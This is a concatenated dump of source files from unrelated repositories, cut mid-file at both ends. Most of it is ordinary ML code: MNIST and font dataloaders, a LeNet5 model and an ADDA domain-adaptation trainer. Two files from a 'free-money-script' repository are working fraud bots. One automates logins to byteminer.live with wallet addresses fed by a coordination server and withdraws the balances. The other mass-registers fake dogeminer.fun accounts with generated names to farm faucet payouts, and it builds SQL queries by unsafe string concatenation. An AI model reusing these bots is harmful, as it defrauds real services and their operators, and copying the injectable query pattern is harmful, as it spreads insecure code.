expand_dir.mkdir(parents=True, exist_ok=True)
download = True
if download:
# Download
def extract_taxonomy(f, zip):
if not zip.getinfo(f).is_dir():
dirs = Path(f).parts
taxonomy_at = dirs.index("taxonomy") if "taxonomy" in dirs else -1
if taxonomy_at > 0 and len(dirs) > (taxonomy_at + 1):
dirs = dirs[(dirs.index("taxonomy") + 1):]
_to = expand_dir.joinpath("/".join(dirs))
_to.parent.mkdir(parents=True, exist_ok=True)
with _to.open("wb") as _to_f:
_to_f.write(zip.read(f))
r = requests.get(self.TAXONOMIES[year], stream=True)
with taxonomy_file.open(mode="wb") as f:
for chunk in r.iter_content(1024):
f.write(chunk)
# Extract zip files
with ZipFile(taxonomy_file, "r") as zip:
# zip.extractall(self.root)
for name in zip.namelist():
if name.endswith('.zip'):
# We have a zip within a zip
zfiledata = BytesIO(zip.read(name))
with ZipFile(zfiledata) as zip2:
for f in zip2.namelist():
extract_taxonomy(f, zip2)
else:
extract_taxonomy(name, zip)
taxonomy_file.unlink()
return expand_dir
def taxonomy_year(self, published_date:datetime, kind:str) -> str:
taxonomy_year = ""
for y in sorted(list(self.TAXONOMIES.keys()), reverse=True):
border_date = datetime(int(y[:4]), 3, 31)
if published_date > border_date:
taxonomy_year = y
break
return taxonomy_year
``` |
{
"source": "5lineofcode/free-money-script",
"score": 3
} |
#### File: 5lineofcode/free-money-script/byteminner.py
```python
import http.client
import requests
import random
import string
import threading
import time
import ssl
from bs4 import BeautifulSoup
from datetime import datetime
withdraw = True
getLoggedinAddress = True
withdrawCompletely = False
unregisteredLogin = False
def getSession():
length_of_string = 40
letters_and_digits = string.ascii_lowercase + string.digits
random_string = ""
for _ in range(length_of_string):
random_string += random.choice(letters_and_digits)
print(random_string)
ci_session = "ci_session=" + random_string
return ci_session
def getAddress():
if(unregisteredLogin):
URL = "http://192.168.3.11:3000/get-single-address"
elif(withdrawCompletely):
URL = "http://192.168.3.11:3000/linked-address/Withdraw"
elif(getLoggedinAddress == True):
URL = "http://192.168.3.11:3000/linked-address/LoggedIn"
else:
URL = "http://192.168.3.11:3000/linked-address/Pending"
r = requests.get(url = URL)
data = r.json()
if(data['message']=="SUCCESS"):
address = data['data']
return address.strip()
else:
return ""
def main(args):
while(True):
f = open("status.txt", "r")
if(f.read().strip()=="0"):
f.close()
break
f.close()
start_at = datetime.now()
address = getAddress()
if(not address):
print("No Data!")
break
ci_session = getSession()
print("address: "+address)
print("ci_session: "+ci_session)
print("----------------")
conn = http.client.HTTPSConnection("byteminer.live")
# conn = http.client.HTTPSConnection("byteminer.live", context = ssl._create_unverified_context())
payload = "username="+address+"&password=<PASSWORD>&reference_user_id="
headers = {
'authority': 'byteminer.live',
'accept': '*/*',
'x-requested-with': 'XMLHttpRequest',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://byteminer.live',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://byteminer.live/z',
'accept-language': 'en-US,en;q=0.9',
'cookie': ci_session
}
conn.request("POST", "/ajax_auth", payload, headers)
res = conn.getresponse()
data = res.read()
print(data)
if('success' in str(data)):
print(".")
elif('Duplicate' in str(data)):
URL = "http://192.168.3.11:3000/update-address/"+address+"/BadAddress"
requests.get(url = URL)
print("Duplicate Error, dont use this address again")
continue
else:
URL = "http://20.198.178.250:3000/update-address/"+address+"/LoginFailed"
requests.get(url = URL)
print("Login Failed")
continue
URL = "http://192.168.3.11:3000/update-address/"+address+"/LoggedIn"
requests.get(url = URL)
print("Login Success")
rememberCode = res.headers["Set-Cookie"].split(";")[0]
if(withdraw==False):
print("----------------")
continue
payload = ''
headers = {
'authority': 'byteminer.live',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://byteminer.live/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': rememberCode + "; " + ci_session
}
conn.request("GET", "/withdrawal", payload, headers)
res = conn.getresponse()
data = res.read()
html = data.decode("utf-8")
soup = BeautifulSoup(html, 'html.parser')
current_user_address = "NO ADDRESS"
for li in soup.select('#transfer input'):
current_user_address = li.get("value")
for li in soup.select('#transfer h1'):
balance = li.text.split(":")[1].strip()
payload = 'amount=' + balance
headers = {
'authority': 'byteminer.live',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://byteminer.live',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://byteminer.live/withdrawal',
'accept-language': 'en-US,en;q=0.9',
'cookie': rememberCode + "; " + ci_session
}
conn.request("POST", "/withdrawal", payload, headers)
res = conn.getresponse()
data = res.read()
if(withdrawCompletely):
URL = "http://20.198.178.250:3000/update-address/"+address+"/Complete"
requests.get(url = URL)
else:
URL = "http://20.198.178.250:3000/update-address/"+address+"/Withdraw"
requests.get(url = URL)
print("---")
print("Address : " + address)
print("Current User : " + current_user_address)
print("Valid : " + str(address == current_user_address))
print("Withdraw Success : " + balance)
print("---")
end_at = datetime.now()
diff = end_at- start_at
print("Finish in " + (str(diff.microseconds/1000)) + "ms")
print("################")
def run_main_thread(args):
try:
main(args)
except:
exit()
f = open("status.txt", "w")
f.write("1")
f.close()
threadCount = 1
if(threadCount>1):
for i in range(threadCount):
t = threading.Thread(target=main, args=(i,))
t.start()
else:
main(0)
```
#### File: 5lineofcode/free-money-script/script.py
```python
import http.client
import requests
import random
import string
import sqlite3
from sqlite3 import Error
import sys
from faker import Faker
fake = Faker()
withdraw = False
address = "D87S8xBmWjgy6UWUhBjeRs8cMjpMyXdQe5"
db = sqlite3.connect('database.db')
conn = http.client.HTTPSConnection("dogeminer.fun")
def query(sql):
cursor = db.cursor()
res = cursor.execute(sql)
db.commit()
return res
def getSession():
length_of_string = 40
letters_and_digits = string.ascii_lowercase + string.digits
random_string = ""
for _ in range(length_of_string):
random_string += random.choice(letters_and_digits)
print(random_string)
ci_session = "wolven_core_session=" + random_string
return ci_session
def getAddress():
URL = "http://localhost:3000/get-target-linked-address"
r = requests.get(url = URL)
data = r.json()
address = data['data']
return address.strip()
def register(username,address):
session_id = getSession()
payload = 'user_name='+username+'&email='+username+'%40gmail.com&email_repeat='+username+'%40gmail.com&password=<PASSWORD>&password_repeat=<PASSWORD>&address='+address+'&tos_agree=1®ister=Register%2BSecurely'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/account/register',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/account/register", payload, headers)
res = conn.getresponse()
data = res.read()
print(data)
print(res.status)
if("Your account was successfully created" in str(data)):
print("Register Success : " + username)
query("insert into dogeminner_address (username,address,status) values('"+username+"','"+address+"','Pending')")
def withdraw_doge(username):
session_id = getSession()
payload = 'user_name='+username+'&password=<PASSWORD>&login=Login%2BSecurely'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/account/login',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/account/login", payload, headers)
res = conn.getresponse()
res.read()
payload = 'claim=Start%2BAuto%2BFaucet'
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://dogeminer.fun',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/page/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("POST", "/page/dashboard", payload, headers)
res = conn.getresponse()
res.read()
redirectUrl = res.headers['Location']
print("RedirectUrl: " + str(redirectUrl))
payload = ''
headers = {
'authority': 'dogeminer.fun',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://dogeminer.fun/page/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': session_id
}
conn.request("GET", redirectUrl, payload, headers)
res = conn.getresponse()
res.read()
print("Withdraw Complete for User : " + username)
def initialize():
sql = """ CREATE TABLE IF NOT EXISTS dogeminner_address (
id integer PRIMARY KEY ,
username text,
address text,
status text
); """
query(sql)
res = query("select count(*) as count from dogeminner_address")
rows = res.fetchall()
data_count = rows[0][0]
min_data_count = 500
if(data_count < min_data_count):
for _ in range(min_data_count-data_count):
name = fake.name().split(" ")[1]
number = '{:03d}'.format(random.randrange(1, 999))
username = (name + number)
register(username,address)
def do_main_job():
cursor = db.cursor()
sql = "select username from dogeminner_address where status = 'Pending' LIMIT 1"
res = cursor.execute(sql)
rows = res.fetchall()
if(len(rows)==0):
sql = "update dogeminner_address set status = 'Pending'"
res = cursor.execute(sql)
db.commit()
do_main_job()
return
username = rows[0][0]
sql = "update dogeminner_address set status = 'Completed' where username = '"+username+"'"
res = cursor.execute(sql)
db.commit()
withdraw_doge(username)
do_main_job()
initialize()
do_main_job()
``` |
{
"source": "5loaves-2fish-12basckets/ADF_studies",
"score": 3
} |
#### File: 01inspections/module/datafunc.py
```python
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
def MNIST(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=True, download=False, transform=trans
)
return dataset
def make_dataloader(data_dir_root, img_size, batch_size):
trainset = MNIST(data_dir_root, img_size)
testset = prepare_dataset(img_size)
trainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testloader = data.DataLoader(testset, batch_size=batch_size, shuffle=False)
return trainloader, testloader
def prepare_dataset(img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.Grayscale(num_output_channels=1),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
# trainset = datasets.ImageFolder('/home/jimmy/datastore/fonts/', transform=trans)
testset = datasets.ImageFolder('/home/jimmy/datastore/fonts/digit', transform=trans)
return testset
'''
previous
import numpy as np
import pandas as pd
import glob
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
#main function to be called
def make_dataloader(data_dir_root, img_size, batch_size):
trainset, testset = read_data
trainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testloader = data.DataLoader(testset, batch_size=batch_size, shuffle=True)
if datatype=='mnist':
dataset = MNIST(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='lsun':
dataset = LSUN(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='celeba':
dataset = CELEBA(data_dir_root, img_size)
return data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
def rearrange_data()
def read_data(data_dir_root)
for file in glob.glob(data_dir_root+'/font/*.csv')
testdata = []
traindata = []
df = pd.read_csv(file)
for i in len(df):
values = df.loc[i].values
# font = values[0]
ascii_code = values[2]
# bold_val = values[3] # normal 0 -> bold 1
# italic = values[4]
array = values[12:]
if i%6==0:
testdata.append((ascii_code, array))
else:
traindata.append((ascii_code, array))
trainset = dataset(traindata)
testset = dataset
class dataset(data.Dataset):
def __init__(self, data):
self.data = data
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return self.data[idx]
class Font(data.Dataset):
def __init__(self, data_dir_root, img_size):
self.DATA = []
# ['TW.csv', 'MONOTXT.csv', 'BERLIN.csv', 'HAETTENSCHWEILER.csv', 'HIMALAYA.csv', 'PHAGSPA.csv',
# 'NIRMALA.csv', 'BERNARD.csv', 'KRISTEN.csv', 'CENTURY.csv', 'MONOSPAC821.csv', 'VIVALDI.csv',
# 'ARIAL.csv', 'FORTE.csv', 'JUICE.csv', 'HARRINGTON.csv', 'BUXTON.csv', 'ROCKWELL.csv', 'CHILLER.csv',
# 'CURLZ.csv', 'TECHNIC.csv', 'PLAYBILL.csv', 'COUNTRYBLUEPRINT.csv', 'IMPRINT.csv', 'NINA.csv',
# 'HARLOW.csv', 'COOPER.csv', 'EDWARDIAN.csv', 'ONYX.csv', 'LUCIDA.csv', 'GADUGI.csv', 'COMIC.csv',
# 'CAARD.csv', 'BAITI.csv', 'ROMANTIC.csv', 'HANDPRINT.csv', 'FELIX TITLING.csv', 'SKETCHFLOW.csv',
# 'BROADWAY.csv', 'MONEY.csv', 'CASTELLAR.csv', 'GLOUCESTER.csv', 'DUTCH801.csv', 'SNAP.csv', 'VERDANA.csv',
# 'RAVIE.csv', 'TAI.csv', 'CENTAUR.csv', 'WIDE.csv', 'CONSTANTIA.csv', 'VINETA.csv', 'LEELAWADEE.csv',
# 'ELEPHANT.csv', 'COMPLEX.csv', 'CREDITCARD.csv', 'MV_BOLI.csv', 'SHOWCARD.csv', 'TREBUCHET.csv',
# 'PALACE.csv', 'GABRIOLA.csv', 'MODERN.csv', 'GEORGIA.csv', 'BOOK.csv', 'GOUDY.csv', 'NUMERICS.csv',
# 'E13B.csv', 'MISTRAL.csv', 'SWIS721.csv', 'GILL.csv', 'GOTHICE.csv', 'MAGNETO.csv', 'CANDARA.csv',
# 'BITSTREAMVERA.csv', 'RAGE.csv', 'EBRIMA.csv', 'CALIBRI.csv', 'STYLUS.csv', 'PANROMAN.csv',
# 'BASKERVILLE.csv', 'BRITANNIC.csv', 'VINER.csv', 'GARAMOND.csv', 'STENCIL.csv', 'ITALIC.csv',
# 'FRENCH.csv', 'JAVANESE.csv', 'ISOC.csv', 'SERIF.csv', 'COURIER.csv', 'BAUHAUS.csv', 'MAIANDRA.csv',
# 'TAHOMA.csv', 'COPPERPLATE.csv', 'FOOTLIGHT.csv', 'KUNSTLER.csv', 'ROMAN.csv', 'PRISTINA.csv',
# 'SANSSERIF.csv', 'SCRIPTB.csv', 'BRUSH.csv', 'MATURA.csv', 'PERPETUA.csv', 'CITYBLUEPRINT.csv',
# 'SCRIPT.csv', 'PAPYRUS.csv', 'SYLFAEN.csv', 'QUICKTYPE.csv', 'CONSOLAS.csv', 'CALIFORNIAN.csv',
# 'GUNPLAY.csv', 'INFORMAL.csv', 'ERAS.csv', 'OCRB.csv', 'MYANMAR.csv', 'RICHARD.csv',
# 'COMMERCIALSCRIPT.csv', 'PALATINO.csv', 'TEMPUS.csv', 'TXT.csv', 'JOKERMAN.csv', 'SEGOE.csv',
# 'SIMPLEX.csv', 'ENGRAVERS.csv', 'BANKGOTHIC.csv', 'FREESTYLE.csv', 'PMINGLIU-EXTB.csv',
# 'VLADIMIR.csv', 'REFERENCE.csv', 'GIGI.csv', 'BODONI.csv', 'BELL.csv', 'OCRA.csv', 'CAMBRIA.csv',
# 'HIGH TOWER.csv', 'IMPACT.csv', 'VIN.csv', 'AGENCY.csv', 'SITKA.csv', 'BRADLEY.csv', 'PROXY.csv',
# 'FRANKLIN.csv', 'ENGLISH.csv', 'SUPERFRENCH.csv', 'MINGLIU.csv', 'NIAGARA.csv', 'CALISTO.csv',
# 'MONOTYPE.csv', 'BLACKADDER.csv', 'CORBEL.csv', 'YI BAITI.csv', 'TIMES.csv', 'BOOKMAN.csv',
# 'EUROROMAN.csv']
class FaceLandmarksDataset(data.Dataset):
"""Face Landmarks dataset."""
def __init__(self, csv_file, root_dir, transform=None):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.landmarks_frame = pd.read_csv(csv_file)
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.landmarks_frame)
def __getitem__(self, idx):
img_name = os.path.join(self.root_dir,
self.landmarks_frame.iloc[idx, 0])
image = io.imread(img_name)
landmarks = self.landmarks_frame.iloc[idx, 1:].as_matrix()
landmarks = landmarks.astype('float').reshape(-1, 2)
sample = {'image': image, 'landmarks': landmarks}
if self.transform:
sample = self.transform(sample)
return sample
#list of datasets to use
def MNIST(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=True, download=True, transform=trans
)
return dataset
def LSUN(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
classes = ['bedroom_train']
dataset = datasets.LSUN(
data_dir_root+'/LSUN',classes=classes, transform=trans
)
return dataset
def CELEBA(data_dir_root, img_size):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.CenterCrop(img_size),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
dataset = datasets.ImageFolder(
data_dir_root+'/CELEBA',trans
)
return dataset
'''
```
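A hedged usage sketch for `make_dataloader` above. It assumes the module is importable as `module.datafunc` per the `01inspections/module/` layout, that MNIST has already been downloaded under the data root passed in, and that the hard-coded `/home/jimmy/datastore/fonts/digit` ImageFolder exists, since the module relies on those paths.

```python
# Sketch only: drive make_dataloader with the paths this module expects.
from module.datafunc import make_dataloader  # import path assumed from 01inspections/module/

trainloader, testloader = make_dataloader('/home/jimmy/datastore', img_size=28, batch_size=64)
images, labels = next(iter(trainloader))
print(images.shape, labels.shape)  # torch.Size([64, 1, 28, 28]) torch.Size([64])
```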
#### File: resource/pytorch-adversarial_box-master/models.py
```python
import torch
import torch.nn as nn
class LeNet5(nn.Module):
def __init__(self):
super(LeNet5, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1, stride=1)
self.relu1 = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(2)
self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1, stride=1)
self.relu2 = nn.ReLU(inplace=True)
self.maxpool2 = nn.MaxPool2d(2)
self.linear1 = nn.Linear(7*7*64, 200)
self.relu3 = nn.ReLU(inplace=True)
self.linear2 = nn.Linear(200, 10)
def forward(self, x):
out = self.maxpool1(self.relu1(self.conv1(x)))
out = self.maxpool2(self.relu2(self.conv2(out)))
out = out.view(out.size(0), -1)
out = self.relu3(self.linear1(out))
out = self.linear2(out)
return out
class SubstituteModel(nn.Module):
def __init__(self):
super(SubstituteModel, self).__init__()
self.linear1 = nn.Linear(28*28, 200)
self.relu1 = nn.ReLU(inplace=True)
self.linear2 = nn.Linear(200, 200)
self.relu2 = nn.ReLU(inplace=True)
self.linear3 = nn.Linear(200, 10)
def forward(self, x):
out = x.view(x.size(0), -1)
out = self.relu1(self.linear1(out))
out = self.relu2(self.linear2(out))
out = self.linear3(out)
return out
```
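A minimal shape check for the `LeNet5` defined above; a sketch that assumes the file is importable as `models` from the same directory.

```python
import torch
from models import LeNet5  # assumed import path for the models.py above

net = LeNet5()
x = torch.randn(4, 1, 28, 28)   # a batch of four MNIST-sized images
logits = net(x)                 # conv/pool twice: 28 -> 14 -> 7, then 7*7*64 -> 200 -> 10
print(logits.shape)             # torch.Size([4, 10])
```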
#### File: 87transfer/module/addatrainer.py
```python
from dann_module.addamodel2 import ADDA
from dann_module.datafunc import make_dataloaders
from tqdm import tqdm
import torch
import os
from math import sqrt
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class Trainer():
def __init__(self, args):
self.model = ADDA()
self.optimizer = torch.optim.Adam(
list(self.model.encoder.parameters()) \
+ list(self.model.classifier.parameters()),
lr=1e-3, betas=(0.5, 0.9)
)
self.ten_optimizer = torch.optim.Adam(self.model.tencoder.parameters(),
lr=1e-4, betas=(0.5, 0.9))
self.tel_optimizer = torch.optim.Adam(self.model.teller.parameters(),
lr=1e-4, betas=(0.5, 0.9))
self.criterion = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
self.sourceloader, self.targetloader, self.testtargetloader = dataloaders
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(self.device)
self.criterion.to(self.device)
self.args = args
self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s.pth'%(args.target[:2]))
self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s.pth'%(args.target[:2]))
self.pretrain_path = os.path.join('ckpt', args.taskname, 'pre_%s.pth'%(args.source[:2]))
self.tarstep = 1
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
if os.path.exists(self.pretrain_path):
self.model.load_pretrain(self.pretrain_path)
else:
self.pretrain()
self.model.target_load_source()
self.adapt_target()
print()
def pretrain(self):
self.model.encoder.train()
self.model.classifier.train()
# bbar = tqdm(range(100), ncols=100, desc='pretrain')
bbar = tqdm(range(self.args.epochs), ncols=100, desc='pretrain')
for epoch in bbar:
pbar = tqdm(self.sourceloader, ncols=100, desc='tr '+str(epoch))
accuracy = 0
length = 0
for img, label in pbar:
img, label = img.to(self.device), label.to(self.device)
self.optimizer.zero_grad()
output = self.model(img)
loss = self.criterion(output, label)
loss.backward()
self.optimizer.step()
acc = output.argmax(1).eq(label).sum()*100//len(label)
accuracy += output.argmax(1).eq(label).sum().item()
length += len(label)
pbar.set_postfix(loss=loss.item(), acc=acc.item())
accuracy = accuracy * 100 / length
bbar.set_postfix(acc=accuracy)
self.model.save(self.pretrain_path)
def adapt_target(self):
self.model.tencoder.train()
self.model.teller.train()
num_iteration = min(len(self.sourceloader), len(self.targetloader))
bbar = tqdm(range(500), ncols=100, desc='adapt')
# bbar = tqdm(range(self.args.epochs), ncols=100, desc='adapt')
best_acc = 0
for epoch in bbar:
total_acc=0
length=0
target_acc=0
tlength=0
pbar = tqdm(range(num_iteration), ncols=100, desc='ada '+str(epoch))
for i in pbar:
simg, __ = next(iter(self.sourceloader))
timg, __ = next(iter(self.targetloader))
simg, timg = simg.to(self.device), timg.to(self.device)
batch_size = len(simg)
# train teller
self.tel_optimizer.zero_grad()
source_feature = self.model.encoder(simg)
target_feature = self.model.tencoder(timg)
concat_feature = torch.cat((source_feature, target_feature), 0)
concat_dom = self.model.teller(concat_feature.detach())
source_lab = torch.ones(batch_size).long().to(self.device)
target_lab = torch.zeros(batch_size).long().to(self.device)
concat_lab = torch.cat((source_lab, target_lab), 0)
tell_loss = self.criterion(concat_dom, concat_lab)
tell_loss.backward()
self.tel_optimizer.step()
afloat = concat_dom.argmax(1).eq(concat_lab).float()
acc = afloat.mean().item()
total_acc += afloat.sum().item()
length += len(afloat)
## train tencoder
for __ in range(self.tarstep):
self.ten_optimizer.zero_grad()
self.tel_optimizer.zero_grad()
target_feature = self.model.tencoder(timg)
target_dom = self.model.teller(target_feature)
target_lab = torch.ones(batch_size).long().to(self.device)
targ_loss = self.criterion(target_dom, target_lab)
targ_loss.backward()
self.ten_optimizer.step()
bfloat = target_dom.argmax(1).eq(target_lab).float()
tacc = bfloat.mean().item()
target_acc+= bfloat.sum().item()
tlength+= len(bfloat)
pbar.set_postfix(teller=acc, target=tacc)
if 0.3 < tacc < 0.4:
self.tarstep = 2
elif 0.2 < tacc < 0.3:
self.tarstep = 3
elif 0.15 < tacc < 0.2:
self.tarstep = 4
elif 0.1 < tacc < 0.15:
self.tarstep = 5
elif tacc < 0.1:
self.tarstep = 6
else:
self.tarstep = 1
total_acc = total_acc * 100 / length ## total domain accuracy
target_acc = target_acc * 100 / tlength
acc, loss = self.test()
if acc>best_acc:
best_acc=acc
self.model.save(self.bestpath)
self.model.save(self.modelpath)
bbar.set_postfix(acc=acc, best_acc=best_acc, tar=target_acc, tel=total_acc)
def test(self):
self.model.eval()
loss = 0
acc = 0
length = 0
pbar = tqdm(self.testtargetloader, ncols=100, desc='test')
for images, labels in pbar:
images, labels = images.to(self.device), labels.to(self.device)
output = self.model(images, mode='target')
loss += self.criterion(output, labels).item()
pred = output.argmax(1)
acc += pred.eq(labels).sum().item()
length += len(labels)
loss /= length
acc /= length
return acc, loss
```
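A hypothetical driver for the ADDA `Trainer` above. The import path, the `hw3_data/digits` dataset layout and the `ckpt/<taskname>` checkpoint directory are all assumptions here, since only the trainer itself is shown in this file.

```python
# Sketch: drive the ADDA Trainer (paths and module name are assumptions).
import os
from argparse import Namespace
from module.addatrainer import Trainer  # import path assumed from 87transfer/module/

args = Namespace(source='mnistm', target='svhn', batch_size=128,
                 epochs=50, taskname='adda_demo')
os.makedirs(os.path.join('ckpt', args.taskname), exist_ok=True)  # where the trainer saves weights
trainer = Trainer(args)  # builds encoders, optimizers and the source/target dataloaders
trainer.train()          # pretrain on source, then adapt the target encoder against the teller
```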
#### File: 87transfer/module/datafunc.py
```python
import torch
import torchvision
from PIL import Image
import os
import csv
# data_root = 'hw3_data/digits'
# dir_list = ['mnistm', 'svhm', 'usps']
class Dataset(torch.utils.data.Dataset):
def __init__(self, data_root='hw3_data/digits', data_name='mnistm', transform=None, train=True):
folder = 'train' if train else 'test'
self.dir = os.path.join(data_root, data_name, folder)
self.labelpath = os.path.join(data_root, data_name, folder+'.csv')
example_filename = os.listdir(self.dir)[0].split('/')[-1].split('.')[0]
self.k = len(str(example_filename))
self.length = len(os.listdir(self.dir))
self.str_ = lambda i: '0' * (self.k - len(str(i))) + str(i)
self._readlabel()
self.trans = torchvision.transforms.ToTensor()
def __len__(self):
return self.length
def __getitem__(self, index):
imgfile = '%s.png'%self.str_(index)
label = self.labeldict[imgfile]
label = torch.LongTensor([label]).squeeze()
imgpath = os.path.join(self.dir, imgfile)
img = Image.open(imgpath)
img = self.trans(img)
img = img.expand(3, 28, 28)
return img, label
def _readlabel(self):
self.labeldict = {}
with open(self.labelpath, newline='') as f:
reader = csv.reader(f)
first = True
for row in reader:
if first:
first = False
else:
self.labeldict[row[0]]=int(row[1])
def make_dataloaders(source, target, batch_size):
sourceset = Dataset(data_name=source, train=True)
sourcetestset = Dataset(data_name=source, train=False)
targetset = Dataset(data_name=target, train=True)
targettestset = Dataset(data_name=target, train=False)
sourceloader = torch.utils.data.DataLoader(sourceset, batch_size=batch_size, shuffle=True)
sourcetestloader = torch.utils.data.DataLoader(sourcetestset, batch_size=batch_size, shuffle=False)
targetloader = torch.utils.data.DataLoader(targetset, batch_size=batch_size, shuffle=True)
targettestloader = torch.utils.data.DataLoader(targettestset, batch_size=batch_size, shuffle=False)
return sourceloader, sourcetestloader, targetloader, targettestloader
def make_loader(source):
dset = Dataset(data_name=source, train=False)
loader = torch.utils.data.DataLoader(dset, batch_size=1, shuffle=True)
return loader
def mnist_dataloaders(batch_size):
trans = torchvision.transforms.ToTensor()
sourceset = torchvision.datasets.MNIST('/home/jimmy/dataset/mnist', train=True, download=False, transform=trans)
targetset = Dataset(data_name='mnistm', train=True)
testtargetset = Dataset(data_name='mnistm', train=False)
sourceloader = torch.utils.data.DataLoader(sourceset, batch_size=batch_size, shuffle=True)
